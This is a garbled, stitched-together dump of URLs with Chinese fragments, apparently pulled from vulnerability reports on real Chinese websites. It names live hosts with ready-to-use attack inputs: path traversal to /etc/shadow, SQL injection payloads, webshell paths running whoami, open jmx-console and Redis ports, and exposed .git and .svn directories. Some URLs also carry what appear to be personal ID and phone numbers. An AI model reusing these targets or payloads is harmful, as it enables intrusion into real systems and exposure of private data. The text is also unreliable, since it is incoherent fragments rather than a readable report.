http://wtncxx.ohdev.cn/web/ http://xq.ailu.cc/web/ http://xqzxyey.ohdev.cn/web/ http://www.leawe.com/case/ http://gxlx.ohdev.cn/web/ http://nbxx.ohdev.cn/web/ http://www.yqhqyz.com/web/ http://xqxx.ohdev.cn/web/ http://lasx.ohdev.cn/web/ http://www.sysxedu.net/web/ http://www.yjobwz.com/web/ http://pysyzx.pyedu.cn/web/ http://www.qxzzx.com/web/ http://www.ailu.cc/web/ http://www.rattsx.com/web/ http://www.rafygx.com/web/ http://www.raxcyx.com/web/ http://www.wzgxzx.com/web/ http://pysyzx.pyedu.cn/web/ http://www.syzx.yje.cn/Web/ http://www.wctvu.com/web/ http://pqczxx.ohdev.cn/ http://xyyx.ohdev.cn/web/ http://wtncxx.ohdev.cn/web/ http://xq.ailu.cc/web/ http://xqzxyey.ohdev.cn/web/ http://system.fjjs.gov.cn/PersonManageWeb/Pages/Print.aspx?approveRecordID=704103、 http://www.snerdi.com.cn/ListInfo1.aspx?Type= http://wooyun.org/bugs/wooyun-2010-097337 http://www.bttszx.com/yemian/dangzhengshou.aspx?id=36 http://59.175.196.52:8080/html/index-6-3.htm http://59.175.196.52:8080/jmx-console/ http://61.187.7.213:9001/vip/reguserjgdm.action?button_type= http://ecampus.sysu.edu.cn/tutorapp/,然后查看:我的学生,可以查询到所有硕士/博士生的个人信息。 http://sms.tiebanshou.com/findPwd/index.action http://zwfw.ordos.gov.cn/getWebPublishContentDetail.action http://gongbao.nc.gov.cn/articleDetail.do?article_id=d8387b4e-4649-498a-b74f-0480ba8a87e6 http://gzzp.gzzypx.net/Index/artview?id=16485 http://www.jpzto.com/upload/auth_image_data/ http://w.3158.cn/main/login.html http://wenda.3158.cn/登入 http://218.70.65.72:89/taxcreditquery/register_page.action http://www.szzsb.net/indexCQB_newsDetails.action http://www.sysredcross.org.cn:8088/sysRedcross/listnews.jsp?id=1 http://218.77.183.59:9001/HAIP/register.action http://1.85.40.234/login.do http://1.85.40.234/verifyLogin.do http://1.85.40.234/login.do www.ctsho.com http://www.ctsho.com/resetPassword.html http://bbs.ctsho.com/admin.php http://222.76.218.175:9002/hrpm/positionAction!getAllPositionForIndexJob.action https://dnsapi.cn/Monitor.List https://github.com/yinwenbo/wei100/blob/076b951d8c3106c9e2c05dda4b87aa62249cc7ec/portal/portal.tenders/src/main/resources/META-INF/tenders.properties https://github.com/congpz/FutureProgramTrading/blob/4db6ae3feeb678ef436fa3244b0fff20427ace91/src/jmail/JmailTest.java http://yeyou.mop.com/payment/Alipay_Pay.aspx?code=Alipay http://yeyou.mop.com/payment/yee_mobile.aspx?code=UNICOM http://yeyou.mop.com/customer/findpass.aspx http://124.117.240.74:8001/log_Login.action http://xf.gdwst.gov.cn/letter/dspletter.jsp?instid=425&zjnum=411234564564123101&mobile=13610035411 http://xf.gdwst.gov.cn/letter/dspletter.jsp?instid=2341&zjnum=440804197709200273&mobile=13728933522 http://xf.gdwst.gov.cn/letter/dspletter.jsp?instid=2835&zjnum=441302198812290516&mobile=13825407002 http://xf.gdwst.gov.cn/letter/dspletter.jsp?instid=3096&zjnum=441881198811112817&mobile=13418090154 http://guestbook.lib.sjtu.edu.cn/add_book.asp http://222.82.215.90:8082/index.php?m=user&f=login CC02802EC0939CA6096D750A27ED94A9:FG=1 http://www.jszzb.gov.cn:2000/news_file/2009101948386652.xls http://www.gsxfga.gov.cn/upload/2011/6/2491537531.xls http://www.qingdao.gov.cn/n172/upload/120908184100600606/140616004824958038.xls http://www.cicp.edu.cn/extra/col1/1350283902.xls http://www.cicp.edu.cn/extra/col1/1381562705.xls http://www.cicp.edu.cn/extra/col1/1304.xls filetype:xls https://s.bt.gg/url?sa=t&rct=j&q=&esrc=s&source=web&cd=8&ved=0CEUQFjAH&url=http%3a%2f%2frlzyhshbzj%2ekzzq%2egov%2ecn%2fUpload%2fOffice%2f20131029141209975%2exls&ei=VsdBVfjqLKLcmAX6yoH4Ag&usg=AFQjCNEcgBg5QO http://219.146.10.132/index!login.do http://42.96.190.138/ http://**.**.**/ http://authentication.suda.edu.cn/authentication.asmx?op=getUserName soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:xsd="http://www.w3.org/2001/XMLSchema xmlns:soap12="http://www.w3.org/2003/05/soap-envelope soap12:Body http://tempuri.org/ http://111.207.203.212:81/extman/ http://222.170.20.34:8001/index!showNews.action?newsId=2c90e6e4360f33b601360fba328c0015 http://nybx.haian.gov.cn:7001/ntai/indexPubDetail.action?contentId=83 http://www.fzyb.cn:7001/fzybweb/newsList.action?zr01web.zr0004=4 http://www.hjxgtzyj.gov.cn/template/hjgtzyj/pagelist_search.jsp?fatherid=5c26e0783ec48a15013ec5ff8fb10127&infotitle=11 http://125.93.53.228/../../../../../../../../../../../../../../../../../etc/hosts http://125.93.53.228/../../../../../../../../../../../../../../../../../etc/shadow http://125.93.53.228/../../../../../../../../../../../../../../../../..//usr/local/hexin/data/text/infodata/upload/7965.html http://125.93.53.228/../../../../../../../../../../../../../../../../../usr/local/hexin/conf/syncd2.ini http://deliver.10jqka.com.cn/deliver/packages/ http://125.93.53.228/../../../../../../../../../../../../../../../../../usr/local/hexin/syncfile/system.xml http://www.huafi.com/ http://www.hnaf120.com/admin/login.aspx http://www.meigedianqi.com/admin/login.aspx http://www.wenjiao.cn/admin/login.aspx http://www.dextt.com/admin/login.aspx http://www.hfxseeds.com/admin/login.aspx http://www.shdrb.com/admin/login.aspx http://www.jckmgs.com/admin/login.aspx http://www.yfntsb.com/admin/login.aspx http://www.hggfj.com/admin/login.aspx http://www.runhe168.com/admin/login.aspx http://www.zzxfdz.com/admin/login.aspx http://www.bst-dz.com/admin/login.aspx http://www.zgfywh.com/admin/login.aspx http://zzdhcq.com/admin/login.aspx http://www.xiangyuanmenye.com/admin/login.aspx http://www.hnsxyt.com/admin/login.aspx http://www.shilifujian.com/admin/login.aspx http://www.zzmxkt.com/admin/login.aspx http://www.greehn.com.cn/admin/login.aspx http://www.huafi.cn/admin/login.aspx http://www.hgblower.com/admin/login.aspx http://www.hnaf120.com/admin/login.aspx https://github.com/opensource-kisszpy/apps/blob/a3dd98ece652db367a75eddf3616e82888fbcd76/app-sns/src/main/filter/dev.properties http://www.59store.com/.git http://www.59store.com/.git/ http://**.**.**/ http://zcweb.jrjkg.com.cn/Upload/DownLoadFile.aspx?DocGUID=b5cfc484-a80a-4b9f-93f6-112de03fb639 demo:eisdemo.landray.com.cn http://eisdemo.landray.com.cn/webdoc/file_download.aspx?guid=19e789719ac343679c070110c147290e http://eisdemo.landray.com.cn/webdoc/file_show.aspx?id=1 http://eisdemo.landray.com.cn/webdoc/HtmlSignatureServer.aspx?DocumentID=1'&SignatureID=1&Signature=1&COMMAND=SHOWSIGNATURE http://eisdemo.landray.com.cn/vote/service.aspx post:action=voteid&ID=1 http://eisdemo.landray.com.cn/sm/bulkinsert_data.aspx?id=1 http://eisdemo.landray.com.cn/sm/data_manager_right_edit.aspx?tableid=1 http://eisdemo.landray.com.cn/sm/DictKey.aspx?DictKey=1 http://bbs.dakele.com/plugin.php?id=nds_up_ques:nds_ques_viewanswer&srchtxt=1&orderby=dateline%20and%201=%28updatexml%281,concat%280x27,version%28%29%29,1%29%29-- http://sdgree.grirms.com:80/ http://www.tgc100.com/portal/news_photoView.action http://www.idc34.com/mainAction!main.action http://122.224.232.157:2010/news/nlk3/marketNewsList.action http://www.zdqh.com/) http://avicuniversity.com/loginAction!login.action http://www.keto.com.cn/system/updateSufUserpwd.action http://gts.s-view.com/gtsel/system/users!toRegister.action http://faq.intersecnet.com/system/system!openRegister.action http://220.179.121.10:8001/house/chart/init.action http://wenhuayn.com/logon.action www.ynwh.net\ http://user.chinaiiss.com http://app.zhcw.com/wwwroot/zhcw/jsp/do3dsjhdc http://sqlmap.org http://fuzhou.mop.com/.svn/entries http://huhehaote.mop.com/.svn/entries http://qz.mop.com/.svn/entries http://xuzhou.mop.com/.svn/entries http://www2.qglt.com.cn/wsrmlt/ly/2.txt http://pj.chinacses.org.cn/corpration/toreg.action http://pj.chinacses.org.cn/ http://pj.chinacses.org.cn/corpration/tomodifypass.action http://blog.vasee.com/.svn/entries http://210.75.213.221/lespweb/ https://auth.gf.com.cn/.git/config inurl:Public/project/ProjectInfo.aspx http://61.184.82.181:8088/Public/project/Projec http://sqlmap.org http://mail.scti.cn/webmail/login9.php www.digilinx.net http://xiu.pps.tv/ http://jiankang.baidu.com/juhe/index?qid=0&pssid=0&pvid=1430389032461841835&tn=NONE&zt=self&wd=&key=人流&aType=14 http://zhixin.baidu.com/My/Index?module=onesite&from=zhixin#health http://m.robam.com/2c1.php?classid=1 http://t.10jqka.com.cn/ucenter/settings/profile http://www.salala.com.cn/liuyan/index.php?page=2&search=1中的search参数,具体如下所示: http://www.salala.com.cn/liuyan/index.php?page=2&search=1 http://sqlmap.org http://app.zhcw.com/wwwroot/zhcw/jsp/gglPK.jsp http://sqlmap.org http://210.44.112.101/servlet/FileUpload?fileName=t.jsp&actionID=update http://210.44.112.101/R9iPortal/upload/t.jsp http://210.44.112.101/servlet/FileUpload http://124.128.96.98:8001/servlet/FileUpload http://61.139.105.105:8008/servlet/FileUpload http://125.67.66.250:801/servlet/FileUpload http://210.41.128.120:8002/servlet/FileUpload http://zfbz.jljsw.gov.cn/xzzf/ URL:http://www.szahotel.com/cn/media/news.aspx?keyword=1 URL:http://www.szahotel.com/cn/member/Order.aspx?Email=TEST@sina.com&OrderNo=1 http://60.172.2.211:8081/ http://www.fyzcgl.com/ http://218.22.115.165:8011/ http://www.fyyqqgz.com/ http://zcgl.yscz.gov.cn:8001/ http://220.180.150.228/ http://www.lqzcgl.com/ http://218.22.114.166:8011/ http://www.fyzcgl.com/fygx/ http://zc100.com/ http://www.fnzcgl.com/ http://zc.mas.gov.cn:8080/ http://zc.yyxcz.gov.cn:81/ https://www.igreenjsq.info/openvpn/.bash_history https://www.igreenjsq.info/openvpn/openvpn.zip soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:xsd="http://www.w3.org/2001/XMLSchema xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/ xmlns:ser="http://service.pt.midas.ufgov.com soapenv:Header/ soapenv:Body ser:getAllUserName soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/ xsi:type="xsd:string ser:getAllUserName soapenv:Body soapenv:Envelope http://210.44.112.101/login.jsp http://210.44.112.101/services/userInfoWeb?wsdl http://124.128.96.98:8001/services/userInfoWeb?wsdl http://61.139.105.105:8008/services/userInfoWeb?wsdl http://125.67.66.250:801/services/userInfoWeb?wsdl http://210.41.128.120:8002/services/userInfoWeb?wsdl http://classzone.ciwong.com/1829627/Member http://classzone.ciwong.com/1829628/Member http://lab.njnu.edu.cn/login.asp http://wooyun.org/bugs/wooyun-2010-025480 http://oa.ucredit.com/login/Login.jsp github.com/richard0147/mysite/blob/bc8b53f0c5d6c9cad5273cd81be69c11afcea042/reports/views.py http://111.11.181.192:8071/customdev_app/app/hotApp/query.action.com http://3g.i.xywy.com/index/login http://www.zjgldrk.cn/epointframe_zjgzg/temporarystay_new/taizhang/people2_detail.aspx?peopleguid=63923f53-0b15-46dd-8299-1c7563973889 http://www.zjgldrk.cn/epointframe_zjgzg/ http://www.zjgldrk.cn/epointframe_zjgzg/20130827_renyuan.rar http://wooyun.org/bugs/wooyun-2015-096948 http://bbs.chinaunix.net/member.php?mod=logging&action=login&logsubmit=yes http://baike.anjuke.com/index.php http://svip.fang.anjuke.com/login http://uctest.ucweb.com:81/wml/Download/Upload/wap2upload.xhtml http://www.h-h.com.cn/visa/view_visa.aspx?id=17,查看签证服务信息,如图所示: http://sqlmap.org http://oa.lytv.tv:8080/Admin/login.jsp http://www.ichengyo.com/ http://user.anjian.com/batch.common.php?action=modelquote&cid=1&name=spacecomments%20where%201=2%20union%20select%201,2,3,4,5,concat%280x7e,user%28%29,0x7e,0x5430304C5320474F21,0x7e%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%23 http://zy.anjian.com//batch.common.php?action=modelquote&cid=1&name=spacecomments%20where%201=2%20union%20select%201,2,3,4,5,concat%280x7e,user%28%29,0x7e,0x5430304C5320474F21,0x7e%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%23 http://unbank.info/toFindBankNodeJsp.action www.unbank.info/loginmain.action www.unbank.info/loginmain.action www.unbank.info/loginmain.action www.unbank.info/loginm.action?type\={0 www.unbank.info/loginm.action?type\={0 http://erya.tsk.erya100.com/teacherLogin http://mc.erya100.com/teacherLogin http://weixin.js.sgcc.com.cn/alipay_web/wx/initSecdCapture.do?consno=8813714511&qd=alipay&openid= http://hrm.cqccn.com/ http://fxr.shandongbusiness.gov.cn:81/safepork/login.action http://**.**.**/ http://baike.anjuke.com/index.php?title=%E7%89%B9%E6%AE%8A:%E7%94%A8%E6%88%B7%E7%99%BB%E5%BD%95&returnto=%E9%A6%96%E9%A1%B5别的权限没注意,可是拥有上传权限,所以 http://www.xunje.com/jiemian.htm http://112.85.215.186/4/album.aspx?albumClass=%B9%FA%CD%E2%C3%F7%D0%C7 http://218.22.185.18:8000/5/album.aspx?albumClass=%B9%FA%CD%E2%C3%F7%D0%C7 http://218.31.50.45:81/4/album.aspx?albumClass=%B9%FA%CD%E2%C3%F7%D0%C7 http://60.207.233.250/5/album.aspx?albumClass=%B9%FA%CD%E2%C3%F7%D0%C7 url:http://www.haier.grirms.com/com.grandison.grirms.phone.web-1.0.0/upPayResult.do https://219.148.162.112/server-status http://www.sitestar.cn/member/change.aspx?ctm=MjAxNS81LzIgMTU6MTA6MzY=&un=ODMxNjY4N0BxcS5jb20=&up=cb16979fd5ba7497bbcec4b1157aad11 http://www.sitestar.cn/member/change.aspx?ctm=2015/5/2 http://www.sitestar.cn/member/change.aspx?ctm=MjAxNS81LzIgMTU6NDU6NTA=&un=MTIxOTg4NjQ5OEBxcS5jb20=&up=cb16979fd5ba7497bbcec4b1157aad11 www.qingcheng.com http://www.qingcheng.com:80/ www.qingcheng.com http://www.wisesz.com/news/down-iphone/down-iphone.shtml然后我就下载了测试一下 http://content.2500city.com/dbadmin/ http://adm.anjuke.com/ http://localhost:8080/login.action http://adm.anjuke.com/login.action http://rsks.mwr.gov.cn/zcxxfw/xxfw/portal/xwgl!findFen.do?pageNow=1&pageSize=20&type=5 http://bioinfo.au.tsinghua.edu.cn/member/fzeng/data/FuseVariantCall/.git/config http://www.ui.cn/gkk/.svn/entries http://www.ui.cn/data/magazine/.svn/entries http://old.ui.cn/manifesto/.svn/entries http://42.62.78.136:88/zhuzhan http://42.62.78.136:88/www http://old.ui.cn/admin/ http://**.**.**/site/downloadFile.action http://118.186.66.235:8080/ http://free.3v.do/reg.html注册一个域名,并添加: www.safedog.cn www.safedog.cn http://www.ihchina.cn/fullTextIndex.action http://**.**.**/tzmszj/admin/fileUpload-downloadTAnnex.action http://eip.hongfa.cn:7001/eip/login.action http://www.myuios.com/source/plugin/tools/tools.php http://dygl.lnparty.com/loginnew.action http://edu.aisino.com/ilearn/en/learner/jsp/dxc/gonggao/viewgg.jsp?id=48 http://mps.aisino.com/ http://mps.aisino.com/merchant_archives/merchantarchives.cmd?reqCode=findArchiveMerchant https://intouch.huawei.com:6510 http://ah.189.cn/sso/login?returnUrl=%2Fservice%2Faccount%2Finit.action http://ah.vnet.cn/userPortal/index.jsp http://shangbao.xyqyw.gov.cn:90/front/login!login1.action http://www.bit-service.com/ http://222.160.140.206/tt/bit-xxzs/xmlpzs/buildingRooms.asp?stanid=1647&realtypeid=&maintable=realnetsubscribe&bustype=164701&businessid=1092319&mainno=103691&showMode=2&editflag=show&buildId=22972 http://www.zzfcj.com.cn:9080/xmlpzs/buildingRooms.asp?stanid=1647&realtypeid=&maintable=realnetsubscribe&bustype=164701&businessid=1092319&mainno=330418&showMode=2&editflag=show&buildId=43837 http://www.snfgj.cn/tt/snxxzs/xmlpzs/buildingRooms.asp?stanid=1647&realtypeid=&maintable=realnetsubscribe&bustype=164701&businessid=1092319&mainno=209810&showMode=2&editflag=show&buildId=13406 http://123.7.180.231/bit-xxzs/xmlpzs/buildingRooms.asp?stanid=1647&realtypeid=&maintable=realnetsubscribe&bustype=164701&businessid=1092319&mainno=758659&showMode=2&editflag=show&buildId=34204 http://www.jyzzfdc.cn/bit-xxzs/xmlpzs/buildingRooms.asp?stanid=&mainno=78322&activeid=1091629&editflag=&reftype=activeComb&actType=1&permitMode=&buildId=4823 http://www.biaochi.com.cn/ http://42.120.7.132/Educational/Register.aspx?clientid=uName&uName=xxxaaa http://222.134.129.66:800/Educational/Register.aspx?clientid=uName&uName=xxxaaa http://study.qht-training.com.cn/Educational/Register.aspx?clientid=uName&uName=xxxaaa http://oa.jcbpo.com:8088/Educational/Register.aspx?clientid=uName&uName=xxxaaa http://xt.bjn3cc.com/Educational/Register.aspx?clientid=uName&uName=xxxaaa http://www.bjuan.cn/front/login/resetPassword.action http://yxxnfz.ntu.edu.cn/virtual/zd_indexZdlistDetail.action http://jcxnfz.ahmu.edu.cn//virtual/zd_indexZdlistDetail.action http://virlab.shutcm.edu.cn/virtual/zd_indexZdlistDetail.action http://vl-study.shsmu.edu.cn:8080/virtual/shouye.action http://jxsyzx.shutcm.edu.cn:8080/virtual/shouye.action http://vecb.ccnu.edu.cn/virtual/shouye.action http://e-lab.cmc.edu.cn/virtual/shouye.action http://xnfz.szu.edu.cn/virtual/shouye.action http://xnsys.immu.edu.cn/virtual/shouye.action http://mvl.sdu.edu.cn/virtual/shouye.action http://zcweb.jrjkg.com.cn/Upload/DownLoadFile.aspx?DocGUID=b5cfc484-a80a-4b9f-93f6-112de03fb639 http://api.news18a.com/html/mini/my.html https://x.x.x.x/VRVEIS/MaintenanceAndTools/DownloadCommon.aspx?pathTemp=../web.config http://wooyun.org/bugs/wooyun-2015-0109607 http://bbs.chexun.com/shop_list.php?catid=27&mod=cat http://e.kesion.com/model/view.aspx?m_id=3&id=4373 http://e.kesion.com/model/view.aspx?m_id=3&id=4373 http://**.**.**/admin/login_login.action_ http://**.**.**/admin/login_login.action_ http://**.**.**/admin/login_login.action_ http://**.**.**/admin/login_login.action_ http://**.**.**/admin/login_login.action_ http://**.**.**/admin/login_login.action_ http://**.**.**/admin/login_login.action_ http://**.**.**/admin/login_login.action_ http://**.**.**/admin/login_login.action_ http://**.**.**/admin/login_login.action_ http://**.**.**/portal/login_init.action URL:http://www.xdwy.com.cn/iv.asp?T=Info&iv1=%C3%90%C3%82%C3%8E%C3%85%C2%B9%C2%AB%C2%B8%C3%A6&iv2=&iv3=&ID=700 http://www.fhyx.com/getkey/old.html http://www.fhyx.com/ http://www.frxinzhong.cn/vc2003/login/regist.htm http://www.gzsjpzx.com/vc2003/login/regist.htm http://xw.wwswz.net:81/vc2003/login/regist.htm http://www.zz1z.net/vc2003/login/regist.htm http://www.ayxlgzz.com/vc2003/login/regist.htm http://59.46.39.211/vc2003/login/regist.htm http://www.tlzz.com/vc2003/login/regist.htm http://222.87.3.82/vc2003/login/regist.htm http://www.tlzz.com/vc2003/login/regist.htm做演示 www.tlzz.com http://www.tlzz.com http://www.enet.com.cn/server/inforcenter/search.jsp?page=1&ccid=6093 http://**.**.**//FrameSet/Login.aspx http://shop.ehuatai.com/ http://shop.ehuatai.com/zecmd/zecmd.jsp?comment=whoami http://www.bjprd.com.cn/index.asp http://www.bjprd.com.cn/ http://zcc.nenu.edu.cn/ http://202.197.61.13/ http://202.113.128.61/ http://202.116.0.158/ http://brandbase.mama.cn/friso.php?forumid=122&mod=thread http://p.id5.cn:8080/Login/doLogin.do cn:8888/login/login!validateUser.action http://www.daimayi.com/data/member_img/55459b84ec536.gif/.php http://2012.songtaste.com/st/login.shtml这个接口,应该是一个老的登录接口,发现登录的时候没有任何限制 http://183.60.47.36:8080 http://183.60.47.36:8080 http://free.3v.do/reg.html注册2个免费空间 http://game.cntv.cn/,首页登陆的地方没有验证码机制 http://tuchong.com/login这个接口,也就是主站的登陆接口,没有任何登陆防护设置 http://www.letao.com/wap/app_download.aspx?bid=12%20and%20user%3E00--&op=brand&enable_cookie=True http://legend.7daysinn.cn/Login.aspx,这个接口,找个7天的洞不容易啊- http://mall.jia.com/gys/get_ab_order?orderGroupId=3461444 http://try.mama.cn/admin/index.php http://www.5757car.com/review.php?id=70 http://wooyun.org/bugs/wooyun-2015-0111750/trace/605ab6f7e8d7c86462fde3e77197a9d5 http://www.sz.csg.cn/front/osWireEmailDetail.jhtml?channelCode=osWireEmailDetail&opbel=WEm5K2FX7O57dmcGqJydX1zZ06ZipJr4OQgdzzpTYkg=&SubOpbel=0 http://www.tcqzw.gov.cn/ http://www.tcqzw.gov.cn/admin/Index.asp https://github.com/liyaopinner/ShopHelpper/blob/bcc8e4a98bea70c7c4c7c4e15b71c9f36505d38a/ProjectAdmin/settings.py http://www.pinpaibao.com.cn/ IP:223.203.209.201 Port:6379 IP:223.203.209.204 Port:6379 IP:223.203.209.203 Port:6379 IP:223.203.209.202 Port:6379 http://workflow.weichuan.com.cn/jmx-console/,没有设置访问密码,可以远程部署shell http://www.gdecc.cn/cn/search.aspx?key=1 http://epaper.lbwbw.com/date_panel.aspx?PaperType=esrb http://epaper.lnd.com.cn/date_panel.aspx?PaperType=esrb http://eswb.esznews.com/date_panel.aspx?PaperType=esrb http://www.szsnews.net/date_panel.aspx?PaperType=esrb http://epaper.jnwb.net/date_panel.aspx?PaperType=esrb http://www.xingandaily.cn/date_panel.aspx?PaperType=esrb http://epaper.lbwbw.com/date_panel.aspx?PaperType=esrb http://m.yyrb.cn/date_panel.aspx?PaperType=esrb http://epaper.zhangzepower.com/date_panel.aspx?PaperType=esrb http://www.xjrb.net/date_panel.aspx?PaperType=esrb http://epaper.eccc.com.cn/date_panel.aspx?PaperType=esrb http://ypb.yuping.gov.cn:3080/date_panel.aspx?PaperType=esrb http://esrb.enshi.cn/date_panel.aspx?PaperType=esrb http://epaper.zhangzepower.com/date_panel.aspx?PaperType=esrb http://106.120.238.126:443/ http://i.cnblogs.com/Import.aspx?catid=1 file:///C://WINDOWS/SYSTEM32/DRIVERS/ETC/HOSTS xmlns:dc="http://purl.org/dc/elements/1.1/ xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/ xmlns:wfw="http://wellformedweb.org/CommentAPI/ xmlns:slash="http://purl.org/rss/1.0/modules/slash/ http://www.cnblogs.com/kuoaidebb/ http://www.cnblogs.com/kuoaidebb/archive/2015/05/03/4474500.html dc:creator dc:creator http://www.cnblogs.com/kuoaidebb/archive/2015/05/03/4474500.html http://poc.qingcheng.com http://station.qingcheng.com http://www.daimayi.com/index.php/Loan/loan_detail/p_id/46/i_id/6 http://3g.i.xywy.com/index/login http://passport.xywy.com/member/login.htm?ucback=http%3A%2F%2Fwww.xywy.com%2F,可以看到这个接口也是没有任何登陆限制的,以为也是要和3G的接口一样输入错误几次之后才出现验证码之类的,结果这个接口连验证码都没有 http://lomoservices.lomopai.cn:10154/EditImagev2.2.html?imageName=151c6c6c3bd94899b6d1acedbdb3021c.jpg&sid=670&uid=oFrD3jmTtvVbZHbsQh0YmGKXnKm0&coid=gh_795a11896e12&m=0 www.lomopai.cn,决定直接从数据入手。 http://weixin.lomopai.cn/,通过注入点跑出了所有用户的账号密码。 http://www.8dol.com/ http://wooyun.org/bugs/wooyun-2010-0108762 http://dsp.cig.com.cn http://dsp.cig.com.cn/autodsp/upload/5531b63e583e2.php http://59.151.102.45/comment/All/Default.aspx http://59.151.102.45/ems/ https://121.28.6.30/por/login_psw.csp http://218.15.221.42:8180/ZhaoQingSys/ http://218.15.221.42:8180/ZhaoQingSys/addJgxx.action http://218.15.221.42:8180/ZhaoQingSys/addJgxx.action http://218.15.221.42:8180/ZhaoQingSys/addJgxx.action https://183.62.57.37/por/login_psw.csp https://vpn.zcmu.edu.cn/por/login_psw.csp https://vpn.hutc.zj.cn/por/login_psw.csp https://vpn.zknu.edu.cn/por/login_psw.csp http://tieba.baidu.com/f/bawu/commit/update_member_alias这个链接提交kw和mbr_alias参数,kw是贴吧名称,mbr_alias是要修改的会员名称 http://tieba.baidu.com/f/bawu/commit/update_member_alias http://cms.jiangnan.edu.cn/cms就可以看到后台登陆地址,是一个古老的系统,测试下之前爆出来的漏洞,果然是没有修补上,呵呵呵呵呵。。。 cms.jiangnan.edu.cn/cms/web/downloadFiles.jsp?file=../../../../../../home/cms61.sql http://cms.jiangnan.edu.cn/cms/editor/filemanager/browser/default/browser.html?Type=../../../../../home/cms61/webapps/cms/&Connector=connectors/jsp/connector http://career.fengyunzhibo.com/ http://service.caijing.com.cn/usermanage/login/ http://m.secoo.com/ http://iphone.secoo.com/ http://app.xiaopi.com//.svn/entries https://github.com/feiniu7903/feiniu_pet/blob/41675b17bb90cea95a9112bda0138c694ffd8f8a/Super_operate/src/config/edm_config.properties http://mailer.lvmama.com:8081/smartedm/services/EDMService http://xjt.medlive.cn/login.do http://www.happigo.com/score/?category=1 http://bbs.51credit.com//config/config_global.php.bak http://www.dswjcms.com/ index.php/Site/article/id/1* http://www.xiaobeidai.com/index.php/Site/article/id/18 http://manage.hxbank.biz/index.php/Site/article/id/28 http://www.u1touzi.com/index.php/Site/article/id/24 http://www.fylc888.com/index.php/Site/article/id/112 http://www.yichengjr.com/index.php/Site/article/id/4 http://www.zlinfo.com.cn/fckeditor//editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector http://www.zlinfo.com.cn/fckeditor//editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F http://pu.yonyouup.cn/login!loginIndexPage.action http://tool.110.com/fy.php?q=123 http://gh.bjpost.com.cn/homepage.action http://www.bangcle.com/account/base_edit/ http://www.bangcle.com/static/license/10987.html http://www.dswjcms.com/ index.php/Site/listTpl/id/1* http://manage.hxbank.biz/index.php/Site/listTpl/id/16 http://www.u1touzi.com/index.php/Site/listTpl/id/21 http://www.xiaomenkou.cn/index.php/Site/listTpl/id/21 http://www.luoshangdai.com/index.php/Site/listTpl/id/16 http://www.abroadcash.com/index.php/Site/listTpl/id/28 http://oa.hrsec.com.cn/login/Login.jsp?logintype=1 http://www.myuios.com/.git/config http://219.135.157.142:9000/irpt/i/oem/grpslogin.jsp http://xt.shkdoa.cn:9001/TuoMing/console/tuoming/productJsonAction@input@tuomingInfo.action http://110.249.216.82/Qt_load.do encap:Ethernet D1:C2:96 addr:10.1.1.56 Bcast:10.1.1.255 Mask:255.255.255.0 MTU:1500 packets:637803953 packets:627068681 https://**.**.**/por/login_psw.csp http://www.xike123.cn/ http://wx.sz96296.com/.svn/entries http://119.57.253.101:8010/phpmyadmin/ http://house.dzwww.com/login.php?forward=/ask/这个接口,没有任何登陆保护限制 http://k.yiban.cn/index.php?a=teacherDetail&c=teacherlist&teacherid= http://60.28.168.135/ http://60.28.168.136 http://60.28.168.186/ https://w-tempt1.out.bjcc.qihoo.net/ url:http://www.hnacargo.com/ http://e.kesion.com/ask/ http://e.kesion.com/ask/q-342.html http://www.zjs.com.cn/ws_hr/ws_recruitment_index.aspx http://www.zjs.com.cn/ws_news/ws_news_newssearch.aspx www.zjs.com.cn http://www.hcjdc.com/.svn/entries http://www.hcjdc.com/phpinfo.php http://www.weiping.com/ http://www.weiping.com/用户名 http://www.weiping.com/zhengxq111 http://www.weiping.com/zhengxq111 http://www.weiping.com/zhengxq111 http://www.weiping.com/zhengxq111 http://www.androidesk.com/.git/config http://s.androidesk.com/.git/config http://jira.adesk.com/secure/Dashboard.jspa http://210.14.154.139:8649/ shell:http://www.foscam.com.cn/upimg/1.asp;.pdf http://www.foscam.com.cn/foscam.com.cn.rar http://www.foscam.com.cn/admin/ http://www.foscam.com.cn/admin/ad_html/editor/filemanager/browser/default/browser.html?Type=File&Connector=http%3A%2F%2Fwww.foscam.com.cn%2Fadmin%2Fad_html%2Feditor%2Ffilemanager%2Fconnectors%2Fasp%2Fconnector.asp http://buy.ems.com.cn/),后台的收货地址管理中,对查询收货地址详情的请求没有判断权限,导致可以根据任意数字ID查询其他用户的收货地址、身份证扫描件等资料。 http://159.226.40.241/ http://file.myfund.com/login.html http://aboutus.cits.cn/ http://222.222.32.19:18080/suite/portal/portalView.do?siteKey=0 http://aa.asus.com.cn/Account/Login.aspx http://**.**.**/general/vmeet/wbUpload/test.php http://**.**.**/sql.php http://www.spider.com.cn/forgetPasswordStepThree.html?forgettype=email&verifycode=560236&spsign=826FEA5B9EC7DDEEF7A4596423C462BDC6446B0AA8CED081&sign=15431BCC4B0F7C31E0742FC72DE46F3928D20A07DE91CC3767049198F0818D3FF877D2D39083FA845D40908365E76E88 http://www.spider.com.cn/forgetPasswordStepThree.html?forgettype=email&verifycode=111111&spsign=826FEA5B9EC7DDEEF7A4596423C462BDC6446B0AA8CED081&sign=74D3E2DA8132404D5485B918CABAA10851B1F2B79E0E14F5D70CE4B363ED710BD17AAFED3DB5B39F6D1C21FB547F93599F0BC118A451F187C1C029B2C3978A3F http://paipaiwebservice.jstv.com/api/awards?jsoncallback= https://hbp1.happigo.com/csm/index.php?s=/Public/complain http://dx.ctans.com/online/admin/ http://brandbase.mama.cn/friso.php?forumid=122&mod=thread http://sqlmap.org http://value.17wo.cn/resource/value17wo/LoginForm.action http://www.hunliji.com/merchant/account_manages/fill_info?merchant_id={11481 https://github.com/zhaoming200808/go/blob/b6360310e539c8445593c61005880b2ac677c7d1/tool/gomail.go http://**.**.**/ http://www.hunliji.com/exhibit/community_threads/33510 http://www.hunliji.com/exhibit/community_threads/33507 http://www.goldlib.com.cn/ http://210.26.83.207:8001/opac/getCollection?libId= http://114.242.187.29:8080/opac/getCollection?libId= 